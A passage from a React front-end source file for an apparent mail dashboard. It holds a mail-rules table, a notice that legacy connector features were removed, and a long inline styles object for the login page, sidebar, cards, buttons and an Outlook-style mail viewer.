                      <td style={styles.td}>{rule.condition_type || rule.condition}</td>
                      <td style={styles.td}>{rule.condition_value || rule.keyword}</td>
                      <td style={styles.td}>
                        {Array.isArray(rule.actions) ? rule.actions.join(", ") : (rule.action || "")}
                      </td>
                      <td style={styles.td}>{rule.is_active ? "Active" : "Inactive"}</td>
                      <td style={styles.td}>
                        <button style={styles.dangerButton} onClick={() => deleteRule(rule.id)}>Delete</button>
                      </td>
                    </tr>
                  ))
                )}
              </tbody>
            </table>
          </div>
        </section>
      </div>
    );
  }

  function renderInjector() {
    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardTitle}>Mailbox Connection removed</div>
          <div style={styles.cardSubtitle}>
            Legacy connector/injector features have been removed.
            Use mailbox connection setup instead.
          </div>
          <button
            style={styles.primaryButton}
            onClick={() => setActiveNav("connect")}
          >
            Go to Mailbox Connection Setup
          </button>
        </section>
      </div>
    );
  }

  const styles = {
  appShellDark: {
    background: "#08111f",
    color: "#e5e7eb",
  },
  appShellLight: {
    background: "#f5f7fb",
    color: "#101828",
  },
  sidebarDark: {
    background: "#0f172a",
    borderRight: "1px solid #1e293b",
    color: "#e5e7eb",
  },
  sidebarLight: {
    background: "#ffffff",
    borderRight: "1px solid #eaecf0",
    color: "#101828",
  },
  cardDark: {
    background: "#111827",
    border: "1px solid #253044",
    color: "#e5e7eb",
    boxShadow: "0 16px 40px rgba(0,0,0,0.25)",
  },
  summaryCardDark: {
    background: "#111827",
    border: "1px solid #253044",
    color: "#e5e7eb",
    boxShadow: "0 16px 40px rgba(0,0,0,0.25)",
  },
  inputDark: {
    background: "#0b1220",
    border: "1px solid #334155",
    color: "#e5e7eb",
  },

  sidebarScrollbarHint: {
    fontSize: 10,
    color: "#98a2b3",
    padding: "6px 8px",
  },

    appFrame: {
      height: "100vh",
      display: "flex",
      overflow: "hidden",
      background: isDarkMode ? "#08111f" : "#f4f6fb",
      fontFamily: "Inter, Segoe UI, Arial, sans-serif",
      color: isDarkMode ? "#e5e7eb" : "#101828",
    },
    loadingScreen: {
      minHeight: "100vh",
      display: "flex",
      justifyContent: "center",
      alignItems: "center",
      background: "linear-gradient(135deg, #f0f5ff 0%, #f4f6fb 100%)",
      fontFamily: "Inter, Segoe UI, Arial, sans-serif",
    },
    loadingCard: {
      display: "flex",
      flexDirection: "column",
      alignItems: "center",
      gap: 16,
      padding: 40,
      background: "#fff",
      borderRadius: 24,
      boxShadow: "0 20px 60px rgba(16,24,40,0.10)",
      border: "1px solid #eaecf0",
    },
    loadingSpinner: {
      width: 40,
      height: 40,
      borderRadius: "50%",
      border: "3px solid #eef4ff",
      borderTopColor: "#2563eb",
      animation: "spin 0.8s linear infinite",
    },
    loadingTitle: {
      fontSize: 22,
      fontWeight: 900,
      color: isDarkMode ? "#e5e7eb" : "#101828",
    },
    loadingText: {
      fontSize: 14,
      color: "#667085",
    },
    loginPage: {
      minHeight: "100vh",
      display: "flex",
      justifyContent: "center",
      alignItems: "center",
      background:
        "linear-gradient(135deg, #f8fafc 0%, #eef4ff 52%, #f9fafb 100%)",
      padding: 20,
      position: "relative",
      overflow: "hidden",
      fontFamily: "Inter, Segoe UI, Arial, sans-serif",
      color: "#101828",
    },
    loginShell: {
      width: "100%",
      maxWidth: 860,
      display: "grid",
      gridTemplateColumns: "minmax(0, 1fr) 380px",
      gap: 22,
      alignItems: "center",
    },
    loginHero: {
      minHeight: 300,
      borderRadius: 28,
      padding: 30,
      background:
        "linear-gradient(135deg, rgba(23,92,211,0.98) 0%, rgba(46,144,250,0.92) 58%, rgba(124,58,237,0.90) 100%)",
      color: "#ffffff",
      boxShadow: "0 24px 70px rgba(23,92,211,0.22)",
      border: "1px solid rgba(255,255,255,0.22)",
      display: "flex",
      flexDirection: "column",
      justifyContent: "center",
    },
    loginHeroBadge: {
      alignSelf: "flex-start",
      padding: "6px 10px",
      borderRadius: 999,
      background: "rgba(255,255,255,0.16)",
      border: "1px solid rgba(255,255,255,0.22)",
      fontSize: 12,
      fontWeight: 900,
      letterSpacing: ".04em",
      textTransform: "uppercase",
      marginBottom: 18,
    },
    loginHeroTitle: {
      margin: 0,
      fontSize: 42,
      lineHeight: 1,
      letterSpacing: "-0.04em",
      fontWeight: 950,
    },
    loginHeroText: {
      margin: "14px 0 22px",
      color: "rgba(255,255,255,0.86)",
      fontSize: 15,
      lineHeight: 1.7,
      maxWidth: 420,
    },
    loginHeroStatus: {
      display: "inline-flex",
      alignItems: "center",
      gap: 8,
      color: "rgba(255,255,255,0.92)",
      fontSize: 13,
      fontWeight: 800,
    },
    loginStatusDot: {
      width: 9,
      height: 9,
      borderRadius: "50%",
      background: "#22c55e",
      boxShadow: "0 0 0 4px rgba(34,197,94,0.20)",
    },
    loginCard: {
      position: "relative",
      zIndex: 1,
      width: "100%",
      background: "#ffffff",
      border: "1px solid #e5e7eb",
      boxShadow:
        "0 2px 6px rgba(16,24,40,0.04), 0 22px 55px rgba(16,24,40,0.10)",
      borderRadius: 24,
      padding: 26,
      display: "flex",
      flexDirection: "column",
      gap: 14,
    },
    loginBrandRow: {
      display: "flex",
      alignItems: "center",
      gap: 12,
    },
    loginBrandIcon: {
      width: 40,
      height: 40,
      borderRadius: 12,
      display: "flex",
      alignItems: "center",
      justifyContent: "center",
      background: "linear-gradient(135deg, #175cd3 0%, #2e90fa 100%)",
      color: "#fff",
      fontWeight: 900,
      fontSize: 18,
      boxShadow: "0 8px 18px rgba(23,92,211,0.22)",
      flexShrink: 0,
    },
    loginBrandName: {
      fontSize: 18,
      fontWeight: 950,
      color: "#101828",
      letterSpacing: "-0.02em",
    },
    loginBrandSub: {
      fontSize: 12,
      color: "#667085",
      marginTop: 2,
      fontWeight: 700,
    },
    loginDivider: {
      height: 1,
      background: "#eef2f7",
      margin: "2px 0 2px",
    },
    loginFieldGroup: {
      display: "grid",
      gap: 6,
    },
    loginLabel: {
      fontSize: 12,
      fontWeight: 900,
      color: "#344054",
    },
    loginInput: {
      width: "100%",
      padding: "11px 12px",
      borderRadius: 12,
      border: "1px solid #d0d5dd",
      background: "#ffffff",
      fontSize: 13,
      outline: "none",
      boxSizing: "border-box",
      color: "#101828",
      fontFamily: "inherit",
      transition: "border-color 0.15s ease, box-shadow 0.15s ease",
    },
    loginButton: {
      border: "none",
      background: "linear-gradient(135deg, #175cd3 0%, #2e90fa 100%)",
      color: "#fff",
      borderRadius: 12,
      padding: "12px 16px",
      fontWeight: 950,
      fontSize: 14,
      cursor: "pointer",
      width: "100%",
      boxShadow: "0 10px 22px rgba(23,92,211,0.22)",
      fontFamily: "inherit",
      transition: "opacity 0.15s ease",
    },
    loginFooterNote: {
      textAlign: "center",
      fontSize: 11,
      color: "#98a2b3",
      lineHeight: 1.6,
      paddingTop: 2,
    },
    loginHeading: {
      fontSize: 28,
      fontWeight: 900,
      color: "#101828",
      lineHeight: 1.2,
    },
    loginSubheading: {
      fontSize: 14,
      color: "#667085",
      lineHeight: 1.7,
    },
    sidebar: {
      background: isDarkMode ? "#0f172a" : "#ffffff",
      borderRight: isDarkMode ? "1px solid #1e293b" : "1px solid #eaecf0",
      padding: "14px 10px",
      display: "flex",
      flexDirection: "column",
      justifyContent: "space-between",
      transition: "width 0.25s cubic-bezier(0.4,0,0.2,1)",
      overflowX: "hidden",
      overflowY: "auto",
      flexShrink: 0,
      height: "100vh",
      maxHeight: "100vh",
    },
    sidebarBrandWrap: {
      display: "flex",
      alignItems: "center",
      gap: 10,
      marginBottom: 14,
      padding: "4px 2px",
    },
    sidebarBrandIcon: {
      width: 38,
      height: 38,
      borderRadius: 12,
      display: "flex",
      alignItems: "center",
      justifyContent: "center",
      background: "linear-gradient(135deg, #2563eb 0%, #7c3aed 100%)",
      color: "#fff",
      fontWeight: 900,
      fontSize: 17,
      boxShadow: "0 6px 16px rgba(37,99,235,0.22)",
      flexShrink: 0,
    },
    sidebarBrand: {
      fontSize: 15,
      fontWeight: 900,
      color: isDarkMode ? "#f8fafc" : "#101828",
      whiteSpace: "nowrap",
    },
    sidebarBrandSub: {
      fontSize: 11,
      color: "#98a2b3",
      marginTop: 1,
      whiteSpace: "nowrap",
    },
    collapseButton: {
      width: "100%",
      border: isDarkMode ? "1px solid #334155" : "1px solid #eaecf0",
      background: isDarkMode ? "#111827" : "#f9fafb",
      color: isDarkMode ? "#cbd5e1" : "#667085",
      borderRadius: 10,
      padding: "7px 10px",
      marginBottom: 10,
      cursor: "pointer",
      fontWeight: 800,
      fontSize: 13,
      transition: "all 0.15s ease",
    },
    sidebarSectionTitle: {
      fontSize: 9,
      letterSpacing: 1.2,
      textTransform: "uppercase",
      color: "#b0b8c8",
      fontWeight: 800,
      marginBottom: 4,
      paddingLeft: 3,
      whiteSpace: "nowrap",
    },
    navItem: {
      width: "100%",
      padding: "6px 8px",
      borderRadius: 9,
      border: "1px solid transparent",
      fontWeight: 700,
      fontSize: 11,
      cursor: "pointer",
      marginBottom: 2,
      transition: "all 0.15s ease",
      display: "flex",
      alignItems: "center",
      whiteSpace: "nowrap",
      overflow: "hidden",
      fontFamily: "inherit",
    },
  sidebarCompactNote: {
    fontSize: 10,
    color: "#98a2b3",
    lineHeight: 1.2,
  },
  subSectionTitle: {
    marginTop: 12,
    marginBottom: 8,
    fontSize: 12,
    fontWeight: 900,
    color: "#344054",
    textTransform: "uppercase",
    letterSpacing: ".06em",
  },
  upgradeBanner: {
    display: "flex",
    flexWrap: "wrap",
    gap: 10,
    alignItems: "center",
    padding: "12px 16px",
    borderRadius: 16,
    border: "1px solid #84adff",
    background: "linear-gradient(135deg, #eff6ff 0%, #eef2ff 100%)",
    color: "#175cd3",
    fontSize: 13,
    fontWeight: 800,
    marginBottom: 16,
  },
  progressBadge: {
    padding: "8px 12px",
    borderRadius: 999,
    background: "#101828",
    color: "#fff",
    fontWeight: 900,
    fontSize: 13,
  },
  editorToolbar: {
    display: "flex",
    flexWrap: "wrap",
    gap: 8,
    alignItems: "center",
  },
  richEditor: {
    minHeight: 180,
    padding: 14,
    border: "1px solid #d0d5dd",
    borderRadius: 14,
    background: "#fff",
    color: "#101828",
    outline: "none",
    lineHeight: 1.6,
  },
  checkboxLabel: {
    display: "flex",
    gap: 8,
    alignItems: "center",
    fontSize: 13,
    fontWeight: 700,
    color: "#344054",
    marginBottom: 12,
  },
  sidebarFooter: {
      marginTop: 8,
      display: "grid",
      gap: 6,
    },
    sidebarFooterCard: {
      borderRadius: 14,
      border: isDarkMode ? "1px solid #334155" : "1px solid #eaecf0",
      background: isDarkMode ? "#111827" : "#fafbff",
      padding: 12,
    },
    sidebarFooterTitle: {
      fontSize: 11,
      fontWeight: 900,
      color: isDarkMode ? "#e5e7eb" : "#344054",
    },
    sidebarFooterText: {
      marginTop: 4,
      fontSize: 11,
      color: isDarkMode ? "#94a3b8" : "#98a2b3",
      overflow: "hidden",
      textOverflow: "ellipsis",
      whiteSpace: "nowrap",
    },
    sidebarLogoutButton: {
      width: "100%",
      border: isDarkMode ? "1px solid #334155" : "1px solid #eaecf0",
      background: isDarkMode ? "#0b1220" : "#fff",
      color: isDarkMode ? "#e5e7eb" : "#344054",
      borderRadius: 12,
      padding: "10px 12px",
      fontWeight: 800,
      fontSize: 13,
      cursor: "pointer",
      fontFamily: "inherit",
      transition: "all 0.15s ease",
    },
    mainArea: {
      flex: 1,
      display: "flex",
      flexDirection: "column",
      minWidth: 0,
      minHeight: 0,
      overflow: "hidden",
      background: isDarkMode ? "#08111f" : "#f4f6fb",
    },
    topBar: {
      display: "flex",
      justifyContent: "space-between",
      alignItems: "center",
      gap: 16,
      padding: "16px 20px 12px",
      background: isDarkMode ? "#0f172a" : "#ffffff",
      borderBottom: isDarkMode ? "1px solid #1e293b" : "1px solid #eaecf0",
      position: "sticky",
      top: 0,
      zIndex: 100,
      flexWrap: "wrap",
    },
    pageEyebrow: {
      fontSize: 11,
      fontWeight: 800,
      letterSpacing: 1.2,
      textTransform: "uppercase",
      color: "#2e90fa",
      marginBottom: 4,
    },
    pageTitle: {
      fontSize: 22,
      fontWeight: 900,
      color: isDarkMode ? "#f8fafc" : "#101828",
      lineHeight: 1.1,
    },
    topActions: {
      display: "flex",
      alignItems: "center",
      gap: 10,
      flexWrap: "wrap",
    },
    pageContent: {
      padding: "16px 20px 32px",
      flex: 1,
      minHeight: 0,
      overflowY: "auto",
    },
    pillRow: {
      display: "flex",
      flexWrap: "wrap",
      gap: 8,
      alignItems: "center",
    },
    sectionStack: {
      display: "grid",
      gap: 12,
    },
    dashboardCompact: {
      gap: 10,
      maxWidth: 1480,
    },
    sectionDivider: {
      padding: "10px 14px",
      borderRadius: 12,
      background: isDarkMode ? "#111827" : "#f8fafc",
      border: isDarkMode ? "1px solid #334155" : "1px solid #eaecf0",
      display: "grid",
      gap: 4,
    },
    sectionDividerLabel: {
      fontSize: 13,
      fontWeight: 900,
      color: isDarkMode ? "#e5e7eb" : "#344054",
    },
    sectionDividerNote: {
      fontSize: 11,
      color: "#98a2b3",
      lineHeight: 1.6,
    },
    statGrid: {
      display: "grid",
      gridTemplateColumns: "repeat(4, minmax(170px, 1fr))",
      gap: 10,
      alignItems: "stretch",
    },
    dashGrid: {
      display: "grid",
      gridTemplateColumns: "repeat(2, minmax(0, 1fr))",
      gap: 12,
      alignItems: "start",
    },
    summaryCard: {
      background: isDarkMode
        ? "linear-gradient(145deg, rgba(17,24,39,0.96) 0%, rgba(15,23,42,0.98) 100%)"
        : "linear-gradient(145deg, #ffffff 0%, #f8fbff 100%)",
      border: isDarkMode ? "1px solid rgba(148,163,184,0.18)" : "1px solid rgba(226,232,240,0.95)",
      borderRadius: 18,
      padding: "12px 13px",
      minHeight: 118,
      boxShadow: isDarkMode
        ? "0 14px 38px rgba(0,0,0,0.24), inset 0 1px 0 rgba(255,255,255,0.04)"
        : "0 12px 30px rgba(15,23,42,0.06), inset 0 1px 0 rgba(255,255,255,0.92)",
      position: "relative",
      overflow: "hidden",
      display: "grid",
      gap: 3,
      alignContent: "space-between",
      transition: "transform 160ms ease, box-shadow 160ms ease, border-color 160ms ease",
    },
    summaryCardGlow: {
      position: "absolute",
      top: -34,
      right: -34,
      width: 92,
      height: 92,
      borderRadius: "50%",
      filter: "blur(2px)",
      pointerEvents: "none",
    },
    summaryCardTopRow: {
      display: "flex",
      alignItems: "center",
      justifyContent: "space-between",
      gap: 8,
      position: "relative",
      zIndex: 1,
    },
    summaryCardIcon: {
      width: 34,
      height: 34,
      borderRadius: 12,
      border: "1px solid",
      display: "inline-flex",
      alignItems: "center",
      justifyContent: "center",
      fontSize: 17,
      lineHeight: 1,
      boxShadow: isDarkMode ? "0 10px 22px rgba(0,0,0,0.18)" : "0 8px 18px rgba(15,23,42,0.07)",
    },
    summaryCardAccentDot: {
      width: 8,
      height: 8,
      borderRadius: "50%",
      boxShadow: "0 0 0 4px rgba(148,163,184,0.10)",
    },
    summaryCardLabel: {
      fontSize: 11,
      color: isDarkMode ? "#cbd5e1" : "#64748b",
      fontWeight: 800,
      letterSpacing: 0.2,
      position: "relative",
      zIndex: 1,
    },
    summaryCardValue: {
      fontSize: 25,
      fontWeight: 950,
      color: isDarkMode ? "#f8fafc" : "#0f172a",
      lineHeight: 1.05,
      position: "relative",
      zIndex: 1,
    },
    summaryCardSub: {
      fontSize: 10.5,
      color: isDarkMode ? "#94a3b8" : "#94a3b8",
      lineHeight: 1.35,
      position: "relative",
      zIndex: 1,
    },
    quickGrid: {
      display: "grid",
      gridTemplateColumns: "repeat(3, minmax(0, 1fr))",
      gap: 8,
    },
    miniPanel: {
      borderRadius: 13,
      border: isDarkMode ? "1px solid rgba(51,65,85,0.9)" : "1px solid #e6edf7",
      padding: 10,
      background: isDarkMode ? "rgba(15,23,42,0.72)" : "#fbfdff",
    },
    miniPanelLabel: {
      fontSize: 11,
      color: "#98a2b3",
      fontWeight: 800,
      marginBottom: 6,
      textTransform: "uppercase",
      letterSpacing: 0.8,
    },
    miniPanelValue: {
      fontSize: 16,
      fontWeight: 900,
      color: isDarkMode ? "#f8fafc" : "#101828",
      overflow: "hidden",
      textOverflow: "ellipsis",
      whiteSpace: "nowrap",
    },
    miniPanelMeta: {
      fontSize: 11,
      color: "#98a2b3",
      marginTop: 4,
    },
    card: {
      background: isDarkMode ? "#111827" : "#ffffff",
      border: isDarkMode ? "1px solid #253044" : "1px solid #eaecf0",
      borderRadius: 18,
      padding: "13px 15px",
      boxShadow: "0 10px 26px rgba(16,24,40,0.05)",
      display: "grid",
      gap: 11,
    },
    cardHeaderCompact: {
      display: "flex",
      justifyContent: "space-between",
      alignItems: "flex-start",
      gap: 12,
    },
    cardTitle: {
      fontSize: 16,
      fontWeight: 900,
      color: isDarkMode ? "#f8fafc" : "#101828",
    },
    cardTitleSmall: {
      fontSize: 14,
      fontWeight: 900,
      color: isDarkMode ? "#f8fafc" : "#101828",
      marginBottom: 8,
    },
    cardSubtitle: {
      marginTop: 3,
      fontSize: 12,
      color: "#98a2b3",
      lineHeight: 1.5,
    },
    inlineActions: {
      display: "flex",
      flexWrap: "wrap",
      gap: 8,
      flexShrink: 0,
    },
    compactGrid2: {
      display: "grid",
      gridTemplateColumns: "repeat(2, minmax(0, 1fr))",
      gap: 12,
    },
    compactGrid3: {
      display: "grid",
      gridTemplateColumns: "repeat(3, minmax(0, 1fr))",
      gap: 10,
    },
    input: {
      width: "100%",
      padding: "11px 13px",
      borderRadius: 12,
      border: isDarkMode ? "1px solid #334155" : "1px solid #d0d5dd",
      background: isDarkMode ? "#0b1220" : "#ffffff",
      fontSize: 13,
      outline: "none",
      boxSizing: "border-box",
      color: "#101828",
      fontFamily: "inherit",
      transition: "border-color 0.15s ease",
    },
    select: {
      width: "100%",
      padding: "11px 13px",
      borderRadius: 12,
      border: isDarkMode ? "1px solid #334155" : "1px solid #d0d5dd",
      background: isDarkMode ? "#0b1220" : "#ffffff",
      fontSize: 13,
      outline: "none",
      boxSizing: "border-box",
      color: "#101828",
      fontFamily: "inherit",
    },
    textarea: {
      width: "100%",
      minHeight: 110,
      padding: "11px 13px",
      borderRadius: 12,
      border: isDarkMode ? "1px solid #334155" : "1px solid #d0d5dd",
      background: isDarkMode ? "#0b1220" : "#ffffff",
      fontSize: 13,
      outline: "none",
      boxSizing: "border-box",
      resize: "vertical",
      fontFamily: "inherit",
      color: "#101828",
    },
    label: {
      fontSize: 12,
      fontWeight: 800,
      color: isDarkMode ? "#cbd5e1" : "#344054",
      marginBottom: 6,
      display: "block",
    },
    checkboxRow: {
      display: "flex",
      alignItems: "center",
      gap: 8,
      fontWeight: 700,
      fontSize: 13,
      color: "#344054",
      cursor: "pointer",
    },
    primaryButton: {
      border: "none",
      background: "linear-gradient(135deg, #175cd3 0%, #2e90fa 100%)",
      color: "#fff",
      borderRadius: 12,
      padding: "11px 16px",
      fontWeight: 800,
      fontSize: 13,
      cursor: "pointer",
      boxShadow: "0 4px 14px rgba(23,92,211,0.20)",
      fontFamily: "inherit",
      transition: "opacity 0.15s ease",
      textDecoration: "none",
      display: "inline-flex",
      alignItems: "center",
      justifyContent: "center",
      whiteSpace: "nowrap",
    },
    primaryButtonLarge: {
      border: "none",
      background: "linear-gradient(135deg, #175cd3 0%, #2e90fa 100%)",
      color: "#fff",
      borderRadius: 14,
      padding: "14px 18px",
      fontWeight: 900,
      fontSize: 15,
      cursor: "pointer",
      width: "100%",
      boxShadow: "0 8px 20px rgba(23,92,211,0.22)",
      fontFamily: "inherit",
      transition: "opacity 0.15s ease",
    },
    secondaryButton: {
      border: isDarkMode ? "1px solid #334155" : "1px solid #d0d5dd",
      background: isDarkMode ? "#0b1220" : "#ffffff",
      color: isDarkMode ? "#e5e7eb" : "#344054",
      borderRadius: 12,
      padding: "11px 16px",
      fontWeight: 700,
      fontSize: 13,
      cursor: "pointer",
      fontFamily: "inherit",
      transition: "all 0.15s ease",
      whiteSpace: "nowrap",
    },
    dangerButton: {
      border: "1px solid #fda4af",
      background: "#fff1f2",
      color: "#be123c",
      borderRadius: 12,
      padding: "11px 16px",
      fontWeight: 800,
      fontSize: 13,
      cursor: "pointer",
      fontFamily: "inherit",
      transition: "all 0.15s ease",
      whiteSpace: "nowrap",
    },
    formGrid2: {
      display: "grid",
      gridTemplateColumns: "repeat(2, minmax(0, 1fr))",
      gap: 12,
    },
    buttonRow: {
      display: "flex",
      flexWrap: "wrap",
      gap: 10,
      alignItems: "center",
    },
    infoBox: {
      padding: "10px 12px",
      borderRadius: 10,
      background: isDarkMode ? "#0b1220" : "#f8fafc",
      border: isDarkMode ? "1px solid #334155" : "1px solid #eaecf0",
      fontSize: 12,
      color: "#667085",
      lineHeight: 1.6,
    },
    codeBlock: {
      display: "inline-block",
      fontFamily: "monospace",
      fontSize: 12,
      padding: "4px 8px",
      borderRadius: 6,
      background: isDarkMode ? "#0b1220" : "#f8fafc",
      border: isDarkMode ? "1px solid #334155" : "1px solid #eaecf0",
      color: "#344054",
    },
    loginBrand: {
      fontSize: 18,
      fontWeight: 900,
      color: "#101828",
    },
    loginSubtitle: {
      fontSize: 13,
      color: "#667085",
      lineHeight: 1.5,
      marginBottom: 12,
    },
    outlookLoadMoreButton: {
      width: "100%",
      padding: "10px 12px",
      margin: "8px 0",
      border: "none",
      borderTop: isDarkMode ? "1px solid #1e293b" : "1px solid #eef2f7",
      background: isDarkMode ? "#111827" : "#f8fafc",
      color: isDarkMode ? "#cbd5e1" : "#475467",
      fontSize: 12,
      fontWeight: 800,
      cursor: "pointer",
      fontFamily: "inherit",
    },
    secondaryButtonWide: {
      width: "100%",
      border: "1px solid #d0d5dd",
      background: "#ffffff",
      color: "#344054",
      borderRadius: 12,
      padding: "11px 16px",
      fontWeight: 700,
      fontSize: 13,
      cursor: "pointer",
      fontFamily: "inherit",
    },
    linkPanel: {
      padding: "14px 16px",
      borderRadius: 16,
      border: isDarkMode ? "1px solid #334155" : "1px solid #dbeafe",
      background: isDarkMode ? "#0b1220" : "#f8fbff",
      display: "grid",
      gap: 10,
    },
    linkPanelTitle: {
      fontWeight: 900,
      color: isDarkMode ? "#f8fafc" : "#101828",
      fontSize: 14,
    },
    link: {
      color: "#175cd3",
      fontWeight: 700,
      textDecoration: "none",
      wordBreak: "break-word",
      fontSize: 13,
    },
    alertDanger: {
      padding: "12px       14px",
      borderRadius: 14,
      border: "1px solid #fda4af",
      background: "#fff1f2",
      color: "#be123c",
      fontSize: 13,
      lineHeight: 1.7,
    },
    alertWarning: {
      padding: "12px 14px",
      borderRadius: 14,
      border: "1px solid #fde68a",
      background: "#fffbeb",
      color: "#92400e",
      fontSize: 13,
      lineHeight: 1.7,
    },
    alertTitle: {
      fontWeight: 900,
      marginBottom: 4,
    },
    infoCard: {
      padding: "12px 14px",
      borderRadius: 14,
      border: isDarkMode ? "1px solid #334155" : "1px solid #eaecf0",
      background: isDarkMode ? "#0b1220" : "#f8fafc",
      display: "grid",
      gap: 8,
    },
    infoKey: {
      fontSize: 11,
      fontWeight: 800,
      color: "#98a2b3",
      textTransform: "uppercase",
      letterSpacing: 0.8,
    },
    inlineNote: {
      fontSize: 12,
      color: "#667085",
      lineHeight: 1.6,
    },
    codePill: {
      display: "inline-block",
      fontFamily: "monospace",
      fontSize: 22,
      fontWeight: 900,
      letterSpacing: 6,
      color: "#175cd3",
      background: "#eef4ff",
      borderRadius: 12,
      padding: "8px 16px",
      border: "1px solid #c7d7fe",
    },
    emptyState: {
      padding: "28px 20px",
      textAlign: "center",
      color: isDarkMode ? "#cbd5e1" : "#98a2b3",
      fontSize: 13,
      fontWeight: 600,
      lineHeight: 1.7,
      borderRadius: 14,
      border: isDarkMode ? "1px dashed #334155" : "1px dashed #d0d5dd",
      background: isDarkMode ? "#0b1220" : "#fafbff",
    },
    tableWrap: {
      overflowX: "auto",
      borderRadius: 14,
      border: "1px solid #eaecf0",
    },
    table: {
      width: "100%",
      borderCollapse: "collapse",
      fontSize: 12,
    },
    th: {
      padding: "10px 12px",
      textAlign: "left",
      fontWeight: 800,
      color: "#667085",
      background: "#f8fafc",
      borderBottom: "1px solid #eaecf0",
      whiteSpace: "nowrap",
    },
    td: {
      padding: "10px 12px",
      borderBottom: "1px solid #f2f4f7",
      color: "#344054",
      verticalAlign: "middle",
    },
    mailLayout: {
      display: "grid",
      gridTemplateColumns: "230px 360px minmax(0, 1fr)",
      gap: 0,
      height: isStandaloneMailViewer ? "calc(100vh - 78px)" : "calc(100vh - 118px)",
      alignItems: "stretch",
      border: isDarkMode ? "1px solid #1e293b" : "1px solid #d9e2f1",
      borderRadius: 18,
      overflow: "hidden",
      background: isDarkMode ? "#0f172a" : "#ffffff",
      boxShadow: isDarkMode ? "0 18px 45px rgba(0,0,0,0.25)" : "0 18px 45px rgba(15,23,42,0.08)",
    },
    foldersPane: {
      background: isDarkMode ? "#0b1220" : "#f8fafc",
      borderRight: isDarkMode ? "1px solid #1e293b" : "1px solid #e2e8f0",
      padding: "14px 10px",
      display: "grid",
      gap: 10,
      alignContent: "start",
      minHeight: isStandaloneMailViewer ? "calc(100vh - 78px)" : "calc(100vh - 118px)",
    },
    messagesPane: {
      background: isDarkMode ? "#0f172a" : "#ffffff",
      borderRight: isDarkMode ? "1px solid #1e293b" : "1px solid #e2e8f0",
      padding: 0,
      display: "grid",
      gridTemplateRows: "auto auto auto 1fr",
      height: "100%",
      overflow: "hidden",
    },
    outlookPaneHeader: {
      display: "flex",
      alignItems: "center",
      justifyContent: "space-between",
      padding: "4px 6px 8px",
      gap: 8,
    },
    outlookPaneTitle: {
      fontSize: 15,
      fontWeight: 900,
      color: isDarkMode ? "#f8fafc" : "#172033",
      lineHeight: 1.2,
    },
    outlookPaneSubtle: {
      marginTop: 3,
      fontSize: 11,
      color: isDarkMode ? "#94a3b8" : "#64748b",
      overflow: "hidden",
      textOverflow: "ellipsis",
      whiteSpace: "nowrap",
      maxWidth: 240,
    },
    outlookStatusDotWrap: {
      width: 28,
      height: 28,
      borderRadius: 10,
      background: isDarkMode ? "#111827" : "#ffffff",
      border: isDarkMode ? "1px solid #334155" : "1px solid #e2e8f0",
      display: "flex",
      alignItems: "center",
      justifyContent: "center",
      flexShrink: 0,
    },
    outlookStatusDot: {
      width: 9,
      height: 9,
      borderRadius: "50%",
      display: "inline-block",
    },
    outlookFolderList: {
      display: "grid",
      gap: 4,
      overflowY: "auto",
      maxHeight: isStandaloneMailViewer ? "calc(100vh - 195px)" : "calc(100vh - 235px)",
      paddingRight: 2,
    },
    outlookFolderButton: {
      width: "100%",
      border: "1px solid transparent",
      background: "transparent",
      color: isDarkMode ? "#cbd5e1" : "#334155",
      borderRadius: 10,
      padding: "6px 6px",
      cursor: "pointer",
      display: "grid",
      gridTemplateColumns: "22px 1fr auto",
      gap: 4,
      alignItems: "center",
      textAlign: "left",
      fontFamily: "inherit",
      fontSize: 13,
      fontWeight: 750,
    },
    outlookFolderButtonActive: {
      background: isDarkMode ? "rgba(46,144,250,0.16)" : "#eaf3ff",
      borderColor: isDarkMode ? "rgba(46,144,250,0.35)" : "#bfdbfe",
      color: isDarkMode ? "#dbeafe" : "#175cd3",
    },
    folderIcon: {
      fontSize: 15,
      width: 22,
      textAlign: "center",
      opacity: 0.9,
    },
    folderName: {
      overflow: "hidden",
      textOverflow: "ellipsis",
      whiteSpace: "nowrap",
    },
    folderCount: {
      fontSize: 11,
      color: isDarkMode ? "#94a3b8" : "#64748b",
      fontWeight: 800,
    },
    folderUnread: {
      minWidth: 20,
      height: 20,
      padding: "0 6px",
      borderRadius: 999,
      background: "#175cd3",
      color: "#ffffff",
      display: "inline-flex",
      alignItems: "center",
      justifyContent: "center",
      fontSize: 11,
      fontWeight: 900,
    },
    outlookListHeader: {
      display: "flex",
      alignItems: "center",
      justifyContent: "space-between",
      gap: 10,
      padding: "14px 14px 10px",
      borderBottom: isDarkMode ? "1px solid #1e293b" : "1px solid #eef2f7",
    },
    outlookHeaderActions: {
      display: "flex",
      alignItems: "center",
      gap: 8,
      flexWrap: "wrap",
      justifyContent: "flex-end",
    },
    outlookCompactSelect: {
      width: 76,
      padding: "8px 10px",
      borderRadius: 9,
      border: isDarkMode ? "1px solid #334155" : "1px solid #cbd5e1",
      background: isDarkMode ? "#0b1220" : "#ffffff",
      color: isDarkMode ? "#e5e7eb" : "#0f172a",
      fontSize: 12,
      fontWeight: 800,
      outline: "none",
    },
    outlookSearchShell: {
      margin: "10px 14px",
      borderRadius: 10,
      border: isDarkMode ? "1px solid #334155" : "1px solid #dbe3ef",
      background: isDarkMode ? "#0b1220" : "#f8fafc",
      display: "flex",
      flexWrap: "wrap",
      alignItems: "center",
      gap: 8,
      padding: "8px 10px",
    },
    outlookSearchIcon: {
      color: isDarkMode ? "#94a3b8" : "#64748b",
      fontWeight: 900,
      fontSize: 15,
    },
    outlookSearchInput: {
      border: "none",
      outline: "none",
      background: "transparent",
      width: "100%",
      color: isDarkMode ? "#cbd5e1" : "#334155",
      fontSize: 13,
      fontFamily: "inherit",
      minWidth: 0,
    },
    outlookSearchButton: {
      border: "none",
      background: "#2563eb",
      color: "#ffffff",
      borderRadius: 8,
      padding: "7px 10px",
      fontSize: 12,
      fontWeight: 900,
      cursor: "pointer",
      whiteSpace: "nowrap",
      fontFamily: "inherit",
    },
    outlookSearchClearButton: {
      border: isDarkMode ? "1px solid #334155" : "1px solid #cbd5e1",
      background: isDarkMode ? "#111827" : "#ffffff",
      color: isDarkMode ? "#cbd5e1" : "#475467",
      borderRadius: 8,
      padding: "6px 9px",
      fontSize: 12,
      fontWeight: 850,
      cursor: "pointer",
      whiteSpace: "nowrap",
      fontFamily: "inherit",
    },
    messageList: {
      display: "grid",
      alignContent: "start",
      overflowY: "auto",
